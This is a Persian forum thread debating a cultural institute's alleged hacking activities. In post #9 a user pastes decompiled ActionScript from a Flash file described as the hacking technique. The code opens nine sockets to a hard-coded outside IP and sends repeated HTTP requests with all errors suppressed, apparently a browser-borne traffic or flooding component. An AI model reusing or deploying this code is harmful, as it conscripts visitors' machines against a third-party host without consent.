اطلاعیه

Collapse
No announcement yet.

موسسه فرهنگی نصر

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • موسسه فرهنگی نصر

    http://roshangarane-asr.mihanblog.com

  • #2
    خیلی دوست دارم بدونم چطوری هزاران کامپیوتر هک کردن ! احتمالا هک ۴ تا کلاینت با تروجان نیست ؟
    این نام کاربری متعلق به آقای حسین عسگری نیست .
    جهت یادآوری : هیچ موقع دست از انتقاد سازنده (نه مخرب) به عنوان یک متخصص دست برندارید چراکه همه ی ما نسبت به کشورمون مسئولیم ، نباید اجازه داده بشه یه سری افراد بنام کارهای مفید برای کشور،سرمایه های کشور رو بالا بکشن ، از جمله میلیارد ها میلیارد پول که به افرادی داده میشه که لیاقت و شایستگی تولید نرم افزار یا کارهای امنیتی ندارن وعملا به باد میره .

    Comment


    • #3
      بوی فیلتر شدن شبگرد میاد !!!
      sigpic

      Comment


      • #4
        من میترسم .
        http.
        html
        php
        .
        Я не говорю на большом России.
        но может что-то понять

        Comment


        • #5
          من نمیدونم چرا هر چی بیشتر میخوندم بیشتر خنده ام میگرفت؟
          خدا نمیدونم اگر هستی و درستی : خیلی باحالی -- اگر نیستی که خیلی نا****

          Comment


          • #6
            از منم بگین فقط اینچا اسمم نیست ناراحتم
            ...

            Comment


            • #7
              نوشته اصلی توسط kernel نمایش پست ها
              من نمیدونم چرا هر چی بیشتر میخوندم بیشتر خنده ام میگرفت؟
              اینکه کجای این قضیه جز میهن بلاگش خنده داره من نمیدونم! اگه انقدر خنده داره پس هیولامون چرا ترسیده؟

              Comment


              • #8
                نمیدونم این روز ها چرا اینقد آدمهای عقده ایی زیاد شدن؟!
                یارو معلوم نیست با خودش چند چنده؟
                اینکه سپاه یه مرکز تخصصی سایبری تخصصی داشته باشه ایرادش چیه؟! اتفاقا خیلی هم خوبه حالا با هر اسمی که میخواد باشه
                مگه اسراییل و آمریکا و ... ندارن؟
                اونا حق دارن استاکس نت رو به جون ما بندازن اونوقت اگه ما مقابله به مثل بخوایم بکنیم اسممون میشه تروریست؟!!!

                Comment


                • #9
                  شاید از موضوع یکم جدا باشه اما واسم جالب بود اون تکنیک که زده بودند واسه هک کردن اون یارو
                  تو زیر اکشن اسکریپت فایل فلش رو گذاشتم :


                  کد PHP:
                  [LEFT]//class MainTimeline
                  package Untitled_fla 
                  {
                      
                  import flash.display.*;
                      
                  import flash.events.*;
                      
                  import flash.net.*;
                      
                  import flash.system.*;
                      
                      public 
                  dynamic class MainTimeline extends flash.display.MovieClip
                      
                  {
                          public function 
                  MainTimeline()
                          {
                              
                  super();
                              
                  addFrame******(0frame1);
                              return;
                          }

                          public function 
                  onResponse1(arg1:flash.events.ProgressEvent):void
                          
                  {
                              if (
                  socket1.bytesAvailable 0
                              {
                                  
                  trace(socket1.readUTFBytes(socket1.bytesAvailable));
                              }
                              return;
                          }

                          public function 
                  onResponse2(arg1:flash.events.ProgressEvent):void
                          
                  {
                              if (
                  socket2.bytesAvailable 0
                              {
                                  
                  trace(socket2.readUTFBytes(socket2.bytesAvailable));
                              }
                              return;
                          }

                          public function 
                  onResponse3(arg1:flash.events.ProgressEvent):void
                          
                  {
                              if (
                  socket3.bytesAvailable 0
                              {
                                  
                  trace(socket3.readUTFBytes(socket3.bytesAvailable));
                              }
                              return;
                          }

                          public function 
                  onResponse4(arg1:flash.events.ProgressEvent):void
                          
                  {
                              if (
                  socket4.bytesAvailable 0
                              {
                                  
                  trace(socket4.readUTFBytes(socket4.bytesAvailable));
                              }
                              return;
                          }

                          public function 
                  onResponse5(arg1:flash.events.ProgressEvent):void
                          
                  {
                              if (
                  socket5.bytesAvailable 0
                              {
                                  
                  trace(socket5.readUTFBytes(socket5.bytesAvailable));
                              }
                              return;
                          }

                          public function 
                  onResponse6(arg1:flash.events.ProgressEvent):void
                          
                  {
                              if (
                  socket6.bytesAvailable 0
                              {
                                  
                  trace(socket6.readUTFBytes(socket6.bytesAvailable));
                              }
                              return;
                          }

                          public function 
                  onConnect4(arg1:flash.events.Event):void
                          
                  {
                              
                  socket4.writeUTFBytes("GET / HTTP/1.1\n");
                              
                  socket4.writeUTFBytes("Host: 64.191.51.218\n");
                              
                  socket4.writeUTFBytes("\n");
                              
                  socket4.flush();
                              return;
                          }

                          public function 
                  onResponse7(arg1:flash.events.ProgressEvent):void
                          
                  {
                              if (
                  socket7.bytesAvailable 0
                              {
                                  
                  trace(socket7.readUTFBytes(socket7.bytesAvailable));
                              }
                              return;
                          }

                          public function 
                  onResponse8(arg1:flash.events.ProgressEvent):void
                          
                  {
                              if (
                  socket8.bytesAvailable 0
                              {
                                  
                  trace(socket8.readUTFBytes(socket8.bytesAvailable));
                              }
                              return;
                          }

                          public function 
                  onResponse9(arg1:flash.events.ProgressEvent):void
                          
                  {
                              if (
                  socket9.bytesAvailable 0
                              {
                                  
                  trace(socket9.readUTFBytes(socket9.bytesAvailable));
                              }
                              return;
                          }

                          public function 
                  onConnect1(arg1:flash.events.Event):void
                          
                  {
                              
                  socket1.writeUTFBytes("GET / HTTP/1.1\n");
                              
                  socket1.writeUTFBytes("Host: 64.191.51.218\n");
                              
                  socket1.writeUTFBytes("\n");
                              
                  socket1.flush();
                              return;
                          }

                          public function 
                  onConnect2(arg1:flash.events.Event):void
                          
                  {
                              
                  socket2.writeUTFBytes("GET / HTTP/1.1\n");
                              
                  socket2.writeUTFBytes("Host: 64.191.51.218\n");
                              
                  socket2.writeUTFBytes("\n");
                              
                  socket2.flush();
                              return;
                          }

                          public function 
                  onConnect3(arg1:flash.events.Event):void
                          
                  {
                              
                  socket3.writeUTFBytes("GET / HTTP/1.1\n");
                              
                  socket3.writeUTFBytes("Host: 64.191.51.218\n");
                              
                  socket3.writeUTFBytes("\n");
                              
                  socket3.flush();
                              return;
                          }

                          function 
                  frame1():*
                          {
                              
                  socket1 = new flash.net.Socket();
                              
                  socket2 = new flash.net.Socket();
                              
                  socket3 = new flash.net.Socket();
                              
                  socket4 = new flash.net.Socket();
                              
                  socket5 = new flash.net.Socket();
                              
                  socket6 = new flash.net.Socket();
                              
                  socket7 = new flash.net.Socket();
                              
                  socket8 = new flash.net.Socket();
                              
                  socket9 = new flash.net.Socket();
                              
                  flash.system.Security.allowDomain("*");
                              
                  socket1.addEventListener(flash.events.Event.CONNECTonConnect1);
                              
                  socket1.addEventListener(flash.events.Event.CLOSEonClose1);
                              
                  socket1.addEventListener(flash.events.IOErrorEvent.IO_ERRORonError1);
                              
                  socket1.addEventListener(flash.events.ProgressEvent.SOCKET_DATAonResponse1);
                              
                  socket1.addEventListener(flash.events.SecurityErrorEvent.SECURITY_ERRORonSecError1);
                              
                  socket2.addEventListener(flash.events.Event.CONNECTonConnect2);
                              
                  socket2.addEventListener(flash.events.Event.CLOSEonClose2);
                              
                  socket2.addEventListener(flash.events.IOErrorEvent.IO_ERRORonError2);
                              
                  socket2.addEventListener(flash.events.ProgressEvent.SOCKET_DATAonResponse2);
                              
                  socket2.addEventListener(flash.events.SecurityErrorEvent.SECURITY_ERRORonSecError2);
                              
                  socket3.addEventListener(flash.events.Event.CONNECTonConnect3);
                              
                  socket3.addEventListener(flash.events.Event.CLOSEonClose3);
                              
                  socket3.addEventListener(flash.events.IOErrorEvent.IO_ERRORonError3);
                              
                  socket3.addEventListener(flash.events.ProgressEvent.SOCKET_DATAonResponse3);
                              
                  socket3.addEventListener(flash.events.SecurityErrorEvent.SECURITY_ERRORonSecError3);
                              
                  socket4.addEventListener(flash.events.Event.CONNECTonConnect4);
                              
                  socket4.addEventListener(flash.events.Event.CLOSEonClose4);
                              
                  socket4.addEventListener(flash.events.IOErrorEvent.IO_ERRORonError4);
                              
                  socket4.addEventListener(flash.events.ProgressEvent.SOCKET_DATAonResponse4);
                              
                  socket4.addEventListener(flash.events.SecurityErrorEvent.SECURITY_ERRORonSecError4);
                              
                  socket5.addEventListener(flash.events.Event.CONNECTonConnect5);
                              
                  socket5.addEventListener(flash.events.Event.CLOSEonClose5);
                              
                  socket5.addEventListener(flash.events.IOErrorEvent.IO_ERRORonError5);
                              
                  socket5.addEventListener(flash.events.ProgressEvent.SOCKET_DATAonResponse5);
                              
                  socket5.addEventListener(flash.events.SecurityErrorEvent.SECURITY_ERRORonSecError5);
                              
                  socket6.addEventListener(flash.events.Event.CONNECTonConnect6);
                              
                  socket6.addEventListener(flash.events.Event.CLOSEonClose6);
                              
                  socket6.addEventListener(flash.events.IOErrorEvent.IO_ERRORonError6);
                              
                  socket6.addEventListener(flash.events.ProgressEvent.SOCKET_DATAonResponse6);
                              
                  socket6.addEventListener(flash.events.SecurityErrorEvent.SECURITY_ERRORonSecError6);
                              
                  socket7.addEventListener(flash.events.Event.CONNECTonConnect7);
                              
                  socket7.addEventListener(flash.events.Event.CLOSEonClose7);
                              
                  socket7.addEventListener(flash.events.IOErrorEvent.IO_ERRORonError7);
                              
                  socket7.addEventListener(flash.events.ProgressEvent.SOCKET_DATAonResponse7);
                              
                  socket7.addEventListener(flash.events.SecurityErrorEvent.SECURITY_ERRORonSecError7);
                              
                  socket8.addEventListener(flash.events.Event.CONNECTonConnect8);
                              
                  socket8.addEventListener(flash.events.Event.CLOSEonClose8);
                              
                  socket8.addEventListener(flash.events.IOErrorEvent.IO_ERRORonError8);
                              
                  socket8.addEventListener(flash.events.ProgressEvent.SOCKET_DATAonResponse8);
                              
                  socket8.addEventListener(flash.events.SecurityErrorEvent.SECURITY_ERRORonSecError8);
                              
                  socket9.addEventListener(flash.events.Event.CONNECTonConnect9);
                              
                  socket9.addEventListener(flash.events.Event.CLOSEonClose9);
                              
                  socket9.addEventListener(flash.events.IOErrorEvent.IO_ERRORonError9);
                              
                  socket9.addEventListener(flash.events.ProgressEvent.SOCKET_DATAonResponse9);
                              
                  socket9.addEventListener(flash.events.SecurityErrorEvent.SECURITY_ERRORonSecError9);
                              
                  socket1.connect("64.191.51.218"80);
                              
                  socket2.connect("64.191.51.218"80);
                              
                  socket3.connect("64.191.51.218"80);
                              
                  socket4.connect("64.191.51.218"80);
                              
                  socket5.connect("64.191.51.218"80);
                              
                  socket6.connect("64.191.51.218"80);
                              
                  socket7.connect("64.191.51.218"80);
                              
                  socket8.connect("64.191.51.218"80);
                              
                  socket9.connect("64.191.51.218"80);
                              return;
                          }

                          public function 
                  onConnect5(arg1:flash.events.Event):void
                          
                  {
                              
                  socket5.writeUTFBytes("GET / HTTP/1.1\n");
                              
                  socket5.writeUTFBytes("Host: 64.191.51.218\n");
                              
                  socket5.writeUTFBytes("\n");
                              
                  socket5.flush();
                              return;
                          }

                          public function 
                  onConnect6(arg1:flash.events.Event):void
                          
                  {
                              
                  socket6.writeUTFBytes("GET / HTTP/1.1\n");
                              
                  socket6.writeUTFBytes("Host: 64.191.51.218\n");
                              
                  socket6.writeUTFBytes("\n");
                              
                  socket6.flush();
                              return;
                          }

                          public function 
                  onConnect7(arg1:flash.events.Event):void
                          
                  {
                              
                  socket7.writeUTFBytes("GET / HTTP/1.1\n");
                              
                  socket7.writeUTFBytes("Host: 64.191.51.218\n");
                              
                  socket7.writeUTFBytes("\n");
                              
                  socket7.flush();
                              return;
                          }

                          public function 
                  onConnect8(arg1:flash.events.Event):void
                          
                  {
                              
                  socket8.writeUTFBytes("GET / HTTP/1.1\n");
                              
                  socket8.writeUTFBytes("Host: 64.191.51.218\n");
                              
                  socket8.writeUTFBytes("\n");
                              
                  socket8.flush();
                              return;
                          }

                          public function 
                  onConnect9(arg1:flash.events.Event):void
                          
                  {
                              
                  socket9.writeUTFBytes("GET / HTTP/1.1\n");
                              
                  socket9.writeUTFBytes("Host: 64.191.51.218\n");
                              
                  socket9.writeUTFBytes("\n");
                              
                  socket9.flush();
                              return;
                          }

                          public function 
                  onClose1(arg1:flash.events.Event):void
                          
                  {
                              
                  socket1.close();
                              return;
                          }

                          public function 
                  onClose2(arg1:flash.events.Event):void
                          
                  {
                              
                  socket2.close();
                              return;
                          }

                          public function 
                  onClose3(arg1:flash.events.Event):void
                          
                  {
                              
                  socket3.close();
                              return;
                          }

                          public function 
                  onClose4(arg1:flash.events.Event):void
                          
                  {
                              
                  socket4.close();
                              return;
                          }

                          public function 
                  onClose5(arg1:flash.events.Event):void
                          
                  {
                              
                  socket5.close();
                              return;
                          }

                          public function 
                  onClose6(arg1:flash.events.Event):void
                          
                  {
                              
                  socket6.close();
                              return;
                          }

                          public function 
                  onClose7(arg1:flash.events.Event):void
                          
                  {
                              
                  socket7.close();
                              return;
                          }

                          public function 
                  onClose8(arg1:flash.events.Event):void
                          
                  {
                              
                  socket8.close();
                              return;
                          }

                          public function 
                  onClose9(arg1:flash.events.Event):void
                          
                  {
                              
                  socket9.close();
                              return;
                          }

                          public function 
                  onError1(arg1:flash.events.IOErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onError2(arg1:flash.events.IOErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onError3(arg1:flash.events.IOErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onError4(arg1:flash.events.IOErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onError5(arg1:flash.events.IOErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onError6(arg1:flash.events.IOErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onError7(arg1:flash.events.IOErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onError8(arg1:flash.events.IOErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onError9(arg1:flash.events.IOErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onSecError1(arg1:flash.events.SecurityErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onSecError2(arg1:flash.events.SecurityErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onSecError3(arg1:flash.events.SecurityErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onSecError4(arg1:flash.events.SecurityErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onSecError5(arg1:flash.events.SecurityErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onSecError6(arg1:flash.events.SecurityErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onSecError7(arg1:flash.events.SecurityErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onSecError8(arg1:flash.events.SecurityErrorEvent):void
                          
                  {
                              return;
                          }

                          public function 
                  onSecError9(arg1:flash.events.SecurityErrorEvent):void
                          
                  {
                              return;
                          }

                          public var 
                  movieClip_1:flash.display.MovieClip;

                          public var 
                  socket1:flash.net.Socket;

                          public var 
                  socket2:flash.net.Socket;

                          public var 
                  socket3:flash.net.Socket;

                          public var 
                  socket4:flash.net.Socket;

                          public var 
                  socket5:flash.net.Socket;

                          public var 
                  socket7:flash.net.Socket;

                          public var 
                  socket8:flash.net.Socket;

                          public var 
                  socket9:flash.net.Socket;

                          public var 
                  socket6:flash.net.Socket;
                      }
                  }

                  [/
                  LEFT
                  www.Ragvel.com

                  www.Ahon.ir

                  Comment

                  Working...
                  X